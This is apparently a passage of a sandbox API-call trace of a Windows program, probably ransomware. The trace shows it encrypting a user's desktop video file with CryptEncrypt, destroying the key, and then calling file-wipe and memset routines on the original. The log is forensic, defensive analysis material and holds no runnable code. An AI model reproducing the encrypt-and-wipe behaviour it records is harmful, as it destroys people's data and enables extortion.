PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.358] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.358] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.358] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8ec200*, pdwDataLen=0x6ae220*=0x140b1, dwBufLen=0x140c0 | out: pbData=0x8ec200*, pdwDataLen=0x6ae220*=0x140c0) returned 1 [0030.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.360] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.360] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.360] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.360] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.360] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.360] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.360] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.360] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.360] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.360] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.360] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.367] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.367] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.367] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.370] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.370] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.370] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.370] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.370] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.370] CryptDestroyKey (hKey=0x7c2200) returned 1 [0030.371] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.371] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.371] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.371] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.371] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.371] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.371] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.371] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.371] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.371] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.371] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.371] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.371] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.371] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0030.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.371] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.372] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.372] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.372] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.372] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.372] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.372] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.372] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.372] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.372] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0030.372] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.372] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.372] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0030.373] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.373] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.373] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.373] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.373] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.373] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.373] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0030.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.373] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.373] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.373] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8276fa90, ftCreationTime.dwHighDateTime=0x1d5bada, ftLastAccessTime.dwLowDateTime=0x58a2bd00, ftLastAccessTime.dwHighDateTime=0x1d5ba83, ftLastWriteTime.dwLowDateTime=0x58a2bd00, ftLastWriteTime.dwHighDateTime=0x1d5ba83, nFileSizeHigh=0x0, nFileSizeLow=0x140b1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pRtMXaA65Jvr0xt.mkv", cAlternateFileName="PRTMXA~1.MKV")) returned 0x7c2100 [0030.373] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.374] CharLowerBuffW (in: lpsz="byte[82097]", cchLength=0xb | out: lpsz="byte[82097]") returned 0xb [0030.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.374] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.374] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.374] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.374] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.375] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) 